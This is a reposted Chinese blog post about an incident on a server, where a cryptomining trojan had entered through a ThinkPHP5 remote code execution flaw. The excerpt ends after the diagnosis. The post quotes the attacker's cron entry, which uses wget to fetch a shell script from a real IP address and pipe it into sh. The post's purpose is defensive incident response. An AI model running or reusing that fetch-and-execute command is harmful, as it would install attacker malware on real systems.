记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马

最新推荐文章于 2024-06-02 16:20:04 发布
最新推荐文章于 2024-06-02 16:20:04 发布
阅读量379 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/linkenpark/p/10172883.html
版权

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用

执行命令为 :

/tmp/php  -s /tmp/p2.conf

基本可以确定是被挂马了

下一步确定来源 

last 没有登陆记录

先干掉这几个进程,但是几分钟之后又出现了

先看看这个木马想干什么吧

netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接

但是tcpdump了一小会儿 没有发现任何数据传递

这他是想干啥?

继续查看日志吧 

在cron日志中发现了www用户 有一个crontab定时操作 基本就是这个问题了

ls /var/spool/cron/crontabs/www

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

转载于:https://www.cnblogs.com/linkenpark/p/10172883.html

weixin_30662109
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全之路:我的系统性渗透测试学习框架
03-19 1553
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅录本人当时学习时任然不知的相关知识。笔草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
网络安全应急响应----6、挖矿攻击应急响应
热门推荐
七天
03-21 1万+
文章目录一、挖矿木马简介1、挖矿流程2、挖矿木马的传播方式二、常见的挖矿木马三、挖矿木马应急响应方法3.1、隔离被感染的服务器/主机3.2、确认挖矿进程3.3、系统排查3.3.1、判断挖矿木马挖矿时间3.3.2、了解网络部署环境3.3.3、系统排查3.4、挖矿木马清除四、挖矿木马防御 一、挖矿木马简介 挖矿: 每隔一个时间点,比特币系统会在系统节点上生成一个随机代码,互联网中的所有计算机都可以去寻找此代码,谁找到此代码,就会产生一个区块。而比特币的发行是基于奖励的,每促成一个区块的生成,该节点便获得相应
Java中主函数第一句新建报错_MyEclipse上有main函数类运行报错:Editor does not contain a main type...
weixin_42502860的博客
03-01 436
MyEclipse下有main函数类运行报错:Editor does not contain a main type出现这种问题的原因是,该java文件所在的包没有被MyEclipse认定为源码包。处理方法如下:1.打开Java Build Path窗口,并选择Source界面:2.点击 Add Folder,在对话框中选择该类的根级包,后点确定:3.之后点击确定,等待工作空间build好以后,该...
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
护网蓝队面试题
weixin_44248977的博客
05-22 8663
护网蓝队面试
【网络安全--- 面试题】网络安全常问150道面试题(可能有点小错误)
m0_67844671的博客
09-07 1614
本人精心整理的网络安全150到面试题,包括常见漏洞有关,内网渗透有关,工具的使用,应急响应等等(可能有一些小错误,欢迎大家指出来,一起交流)
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
ThinkPHP框架任意代码执行漏洞利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 436
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 364
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 242
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要得删除该工具,切!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘PbootCMS后台用户账号密码时进行重置。
文件包含漏洞
最新发布
大河之犬的博客
06-02 401
当用户以某种方式控制即将由服务器加载的文件时,就会出现漏洞远程文件包含(RFI): 从远程服务器加载文件。在php中,默认情况下禁用此功能(本地文件包含(LFI): 服务器加载本地文件PHP 过滤器允许在数据被读取或写入之前执行基本的修改操作。有 5 类过滤器:1、字符串过滤器string.strip_tags: 从数据中删除标签(位于 “” 字符之间的所有内容)2、转换过滤器:转换为不同的编码(iconv -l滥用。
源码编译安装LAMP(安装apeche mysql php 论坛 网站 巨详细版)
F12138X的博客
05-26 1360
仰天大笑出门去,我辈岂是蓬蒿人
HackTheBox-Machines--Popcorn
七天
05-28 541
Popcorn 测试过程。
建WordPress主题官网模板
xiaoyuya
05-30 275
WordPress主题官网模板
thinkphp 远程代码执行原理
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞的原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值